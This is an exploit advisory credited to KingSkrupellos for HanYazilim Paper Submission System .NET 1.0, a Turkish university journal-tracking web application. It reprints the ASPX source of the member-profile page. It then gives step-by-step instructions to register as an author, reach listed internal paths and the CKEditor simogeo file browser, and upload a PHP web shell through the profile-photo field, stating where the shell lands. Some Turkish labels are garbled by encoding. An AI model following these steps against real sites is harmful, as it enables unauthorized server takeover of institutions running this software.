HanYazilim Paper Submission System .NET 1.0 Shell Upload

`#################################################################################  
  
# Exploit Title : HanYazilim Paper Submission System .NET v1.0 Privilege  
Escalation / Shell Upload  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 22/02/2019  
# Vendor Homepage : hanyazilim.com  
# Software Information Link : hanyazilim.com/hakemlimakaletakipsistemi.pdf  
videolar.hanyazilim.com  
# CKEditor Simogeo Download :  
github.com/simogeo/ckeditor-adv_link/archive/master.zip  
# Software Version : 1.0  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : High  
# Vulnerability Types :  
CWE-266: Incorrect Privilege Assignment  
CWE-269: Improper Privilege Management  
CWE-284: Improper Access Control  
CWE-250: Execution with Unnecessary Privileges  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
#################################################################################  
  
# Description about Software :  
***************************  
HanYazilim Makale Takip Sistemi .NET v1.0 is a kind of Turkish Software  
that can be tracked articles  
  
and the journals is used for Turkish University Faculties.  
  
#################################################################################  
  
# Impact and Consequences :  
****************************  
* This Software [ Product ] HanYazilim Makale Takip Sistemi .NET v1.0  
incorrectly assigns  
  
a privilege to a particular actor, creating an unintended sphere of  
control for that actor.  
  
* The software does not restrict or incorrectly restricts access to a  
resource from an unauthorized actor.  
  
* The software performs an operation at a privilege level that is higher  
than the minimum  
  
level required, which creates new weaknesses or amplifies the consequences  
of other weaknesses.  
  
* The software does not properly assign, modify, track, or check privileges  
  
for an actor, creating an unintended sphere of control for that actor.  
  
#################################################################################  
  
# Vulnerable Source Code : [ uyelikbilgilerim.aspx ]  
*********************************************  
  
<%@ Page Language="C#" MasterPageFile="~/Uye.master" AutoEventWireup="true"  
CodeFile="UyelikBilgilerim.aspx.cs" Inherits="UyelikBilgilerim"  
Title="Untitled Page" culture="auto" meta:resourcekey="PageResource1"  
uiculture="auto" %>  
  
<asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server">  
<style type="text/css">  
.style1  
{  
width: 801px;  
height: 70px;  
  
}  
.style7  
{  
width: 135px;  
}  
.style351  
{  
color: #FF0000;  
}  
.style357  
{  
width: 135px;  
height: 28px;  
}  
.style358  
{  
width: 1200px;  
height: 28px;  
}  
</style>  
<link href="images/mainstyle.css" rel="stylesheet" type="text/css" />  
  
</asp:Content>  
<asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1"  
Runat="Server">  
<table class="tablosayfaadi">  
<tr>  
<td class="tablosayfayazi">  
<asp:Label ID="Label1" runat="server" Text="Uye Detay/Member  
Details"  
meta:resourcekey="Label1Resource1"></asp:Label></td>  
</tr>  
</table>  
<table class="style1">  
<tr>  
<td class="style7">  
&nbsp;</td>  
<td class="style6">  
<asp:Label ID="Label4" runat="server" CssClass="style351"  
Text="Label"  
Visible="False"  
meta:resourcekey="Label4Resource1"></asp:Label>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label2" runat="server" Text="AdA+- SoyadA+-"  
meta:resourcekey="Label2Resource1"></asp:Label>  
</td>  
<td class="style6">  
<asp:TextBox ID="TextBox1" runat="server" Width="290px"  
meta:resourcekey="TextBox1Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator1"  
runat="server"  
ControlToValidate="TextBox1" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator1Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label5" runat="server" Text="Unvan /Title"  
meta:resourcekey="Label5Resource1"></asp:Label></td>  
<td class="style8">  
<asp:DropDownList ID="DropDownList2" runat="server"  
meta:resourcekey="DropDownList2Resource1">  
<asp:ListItem Value="1"  
meta:resourcekey="ListItemResource1">AraAtA+-rma GAPrevlisi</asp:ListItem>  
<asp:ListItem Value="2"  
meta:resourcekey="ListItemResource2">Doktor</asp:ListItem>  
<asp:ListItem Value="3"  
meta:resourcekey="ListItemResource3">Yrd.DoASSent</asp:ListItem>  
<asp:ListItem Value="4"  
meta:resourcekey="ListItemResource4">DoASS. Dr.</asp:ListItem>  
<asp:ListItem Value="5"  
meta:resourcekey="ListItemResource5">Prof. Dr.</asp:ListItem>  
<asp:ListItem Value="6"  
meta:resourcekey="ListItemResource6">DiAer</asp:ListItem>  
</asp:DropDownList>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator10"  
runat="server"  
ControlToValidate="DropDownList2" ErrorMessage="*"  
InitialValue="0"  
  
meta:resourcekey="RequiredFieldValidator10Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label6" runat="server"  
Text="E-Posta /Email"  
  
meta:resourcekey="Label6Resource1"></asp:Label>  
</td>  
<td class="style6">  
<asp:TextBox ID="TextBox3" runat="server" Width="290px"  
ReadOnly="True"  
meta:resourcekey="TextBox3Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator3"  
runat="server"  
ControlToValidate="TextBox3" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator3Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style357">  
<asp:Label ID="Label7" runat="server"  
Text="Parola /Password"  
  
meta:resourcekey="Label7Resource1"></asp:Label>  
</td>  
<td class="style358">  
<asp:TextBox ID="TextBox4" runat="server" Width="290px"  
meta:resourcekey="TextBox4Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator4"  
runat="server"  
ControlToValidate="TextBox4" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator4Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label8" runat="server"  
Text="AdegA Telefonu /Office Telephone"  
  
meta:resourcekey="Label8Resource1"></asp:Label>  
</td>  
<td class="style6">  
<asp:TextBox ID="TextBox5" runat="server" Width="290px"  
meta:resourcekey="TextBox5Resource1"></asp:TextBox>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label9" runat="server"  
Text="Cep Telefonu /GSM"  
  
meta:resourcekey="Label9Resource1"></asp:Label>  
</td>  
<td class="style6">  
<asp:TextBox ID="TextBox6" runat="server" Width="290px"  
meta:resourcekey="TextBox6Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator12"  
runat="server"  
ControlToValidate="TextBox6" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator12Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label10" runat="server"  
Text="Adresi /Address"  
  
meta:resourcekey="Label10Resource1"></asp:Label>  
</td>  
<td class="style6">  
<asp:TextBox ID="TextBox7" runat="server" Width="290px"  
meta:resourcekey="TextBox7Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator9"  
runat="server"  
ControlToValidate="TextBox7" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator9Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label11" runat="server"  
Text="Kurumu /Institution"  
  
meta:resourcekey="Label11Resource1"></asp:Label></td>  
<td class="style6">  
<asp:TextBox ID="TextBox8" runat="server" Width="290px"  
meta:resourcekey="TextBox8Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator6"  
runat="server"  
ControlToValidate="TextBox8" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator6Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label12" runat="server"  
Text="GAPrevi /Task"  
  
meta:resourcekey="Label12Resource1"></asp:Label></td>  
<td class="style6">  
<asp:TextBox ID="Gorevi" runat="server" Width="290px"  
meta:resourcekey="GoreviResource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator13"  
runat="server"  
ControlToValidate="Gorevi" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator13Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label13" runat="server"  
Text="AlanA+- /Field"  
  
meta:resourcekey="Label13Resource1"></asp:Label></td>  
<td class="style6">  
<asp:TextBox ID="Alani" runat="server" Width="290px"  
meta:resourcekey="AlaniResource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator7"  
runat="server"  
ControlToValidate="Alani" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator7Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label14" runat="server"  
Text="KA+-sa AzgeASSmiA /Short Biography"  
  
meta:resourcekey="Label14Resource1"></asp:Label></td>  
<td class="style6">  
<asp:TextBox ID="TextBox10" runat="server" Height="69px"  
TextMode="MultiLine"  
Width="290px"  
meta:resourcekey="TextBox10Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator8"  
runat="server"  
ControlToValidate="TextBox10" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator8Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label15" runat="server"  
Text="Profil FotografA+- /Profile Photo"  
  
meta:resourcekey="Label15Resource1"></asp:Label>  
</td>  
<td class="style6" valign="middle">  
<asp:Image ID="Image1" runat="server" Height="75px"  
Width="75px"  
meta:resourcekey="Image1Resource1" />  
</td>  
</tr>  
<tr>  
<td class="style7">  
&nbsp;</td>  
<td class="style6">  
<asp:CheckBox ID="CheckBox2" runat="server"  
AutoPostBack="True"  
oncheckedchanged="CheckBox2_CheckedChanged"  
Text="Ayelik Resmini DeAiAtir /Change Profile Photo"  
meta:resourcekey="CheckBox2Resource1" />  
<asp:FileUpload ID="FileUpload1" runat="server"  
Visible="False"  
meta:resourcekey="FileUpload1Resource1" />  
<asp:RequiredFieldValidator ID="RequiredFieldValidator11"  
runat="server"  
ControlToValidate="FileUpload1" ErrorMessage="*"  
Visible="False"  
  
meta:resourcekey="RequiredFieldValidator11Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label16" runat="server"  
Text="Ayelik Tipi /Membership Type"  
  
meta:resourcekey="Label16Resource1"></asp:Label>  
</td>  
<td class="style6">  
<asp:DropDownList ID="DropDownList1" runat="server"  
meta:resourcekey="DropDownList1Resource1">  
<asp:ListItem Value="1"  
meta:resourcekey="ListItemResource7">Yazar</asp:ListItem>  
<asp:ListItem Value="2"  
meta:resourcekey="ListItemResource8">Hakem</asp:ListItem>  
<asp:ListItem Value="3"  
meta:resourcekey="ListItemResource9">EditAPr</asp:ListItem>  
</asp:DropDownList>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label17" runat="server" Text="Ayelik Durumu  
/Membership Status"  
meta:resourcekey="Label17Resource1"></asp:Label></td>  
<td class="style6">  
<asp:CheckBox ID="CheckBox1" runat="server"  
meta:resourcekey="CheckBox1Resource1" />  
</td>  
</tr>  
<tr>  
<td class="style7">  
&nbsp;<asp:Label ID="Label18" runat="server" Text="GA1/4venlik  
Kodu"  
meta:resourcekey="Label18Resource1"></asp:Label></td>  
<td class="style6">  
<asp:TextBox ID="TextBox11" runat="server"  
meta:resourcekey="TextBox11Resource1"></asp:TextBox>  
</td>  
</tr>  
<tr>  
<td class="style7">  
&nbsp;</td>  
<td class="style6">  
<img src="GuvenlikKodu.aspx">&nbsp;<asp:Label  
ID="lblDusunceler" runat="server"  
Visible="False"  
meta:resourcekey="lblDusuncelerResource1"></asp:Label>  
</td>  
</tr>  
<tr>  
<td class="style7">  
&nbsp;</td>  
<td class="style6">  
<asp:Button ID="Button1" runat="server" Text="DeAiAtir  
/Change" Height="26px"  
onclick="Button1_Click1"  
meta:resourcekey="Button1Resource1" />  
</td>  
</tr>  
<tr>  
<td class="style7">  
&nbsp;</td>  
<td class="style6">  
<asp:Label ID="Label3" runat="server" Text="Label"  
Visible="False"  
meta:resourcekey="Label3Resource1"></asp:Label>  
</td>  
</tr>  
<tr>  
<td class="style7">  
&nbsp;</td>  
<td class="style6">  
&nbsp;</td>  
</tr>  
</table>  
<table class="tablosayfaadi">  
<tr>  
<td class="tablosayfayazi">  
&nbsp;</td>  
</tr>  
</table>  
</asp:Content>  
  
#################################################################################  
  
# Privelege Escalation Exploit :  
***************************  
# Usage :  
*********  
# Register yourself as Author => [ Yazar ] account. [ New Admin ]  
  
# Registeration with random e-mail address and choose Professor Doctor.  
  
# Put password for your account.  
  
# Fill All the Blanks. Enter Captchas.  
  
/YeniUyelik.aspx  
  
# After Successfull Registeration => it says =>  
  
Your registration has been completed successfully.  
  
Now you can login to the web site with your username and password..  
  
# Admin Panel Login Path :  
************************  
/Hata.aspx?Mesaj=3  
  
# Usable Author Control Links :  
****************************  
/UyeTumMakaleler.aspx?Mesaj=2  
/UyeTumMakaleler.aspx?Goster=0  
/UyeYayinlanacaklarDefault.aspx?Goster=4  
/Arama.aspx  
/MakaleGonder.aspx  
/Mesajlar.aspx  
/GonderilenMesajlar.aspx  
/MesajGonder.aspx  
  
Exploitation =>  
**************  
/ckeditor/plugins/simogeo/Browser.aspx  
  
/UyelikBilgilerim.aspx  
  
It says in Turkish Language :  
  
Ayelik Resmini DeAiAtir. [ Change your Membership picture ]  
  
Choose your .php file to upload from My Profile Photo.  
  
Shell Uploaded Successfully.  
  
Directory File Path :  
******************  
/UyeResimleri/[RANDOM-NUMBER]_[yourshellnamehere].php  
  
#################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
####################################################################  
`